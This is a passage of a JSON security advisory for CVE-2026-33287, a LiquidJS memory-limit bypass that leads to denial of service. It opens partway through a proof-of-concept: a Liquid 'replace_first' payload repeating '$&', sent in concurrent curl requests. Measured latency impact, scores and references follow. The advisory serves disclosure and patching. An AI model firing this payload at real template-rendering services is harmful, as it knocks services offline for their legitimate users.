%}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{{ s }}' &\ndone\n\n# Legitimate user request (concurrent)\ncurl -w \"Normal: %{time_total}s\\n\" -s -o /dev/null --max-time 60 -X POST \"http:///render\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'template=

Hello

' &\n\nwait\n```\n\nReplace `http:///render` with the actual template rendering endpoint. The payload is pure Liquid syntax and works regardless of the HTTP framework.\n\n### Impact\n- **`memoryLimit` security bypass**: The memory limit is rendered ineffective for templates using `replace_first` with `$&` patterns.\n- **Demonstrated Denial of Service**: A single request allocates 312.5 MB (625 MB heap). Concurrent requests cause **complete service unavailability**. Due to Node.js single-threaded architecture, the event loop is blocked and all legitimate user requests are stalled.\n- **Measured service disruption** (LiquidJS 10.24.0, Node.js v20, empirically verified):\n\n | Concurrent Attack Requests | Legitimate User Latency | vs. Baseline | Server Blocked |\n |---------------------------|------------------------|-------------|---------------|\n | 10 | 3.2s | **640x** | ~11s |\n | 20 | **10.9s** | **2,180x** | ~29s |\n\n With 20 concurrent requests, legitimate user requests are **delayed by 10.9 seconds** and the server becomes **completely unresponsive for 29 seconds**. Requests sent 6 seconds after the attack began still took 8 seconds, confirming sustained service disruption throughout the attack window. The attack cost is ~500 bytes per HTTP request.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-6q5m-63h6-5x4v.json?alt=media" }, { "category": "other", "text": "0.00044", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Exploit code publicly available", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5913695", "CSAFPID-5937998", "CSAFPID-5965484" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-6q5m-63h6-5x4v" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33287" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33287.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-6q5m-63h6-5x4v.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-6q5m-63h6-5x4v" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33287" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5913695", "CSAFPID-5937998", "CSAFPID-5965484" ] } ], "title": "CVE-2026-33287" } ] }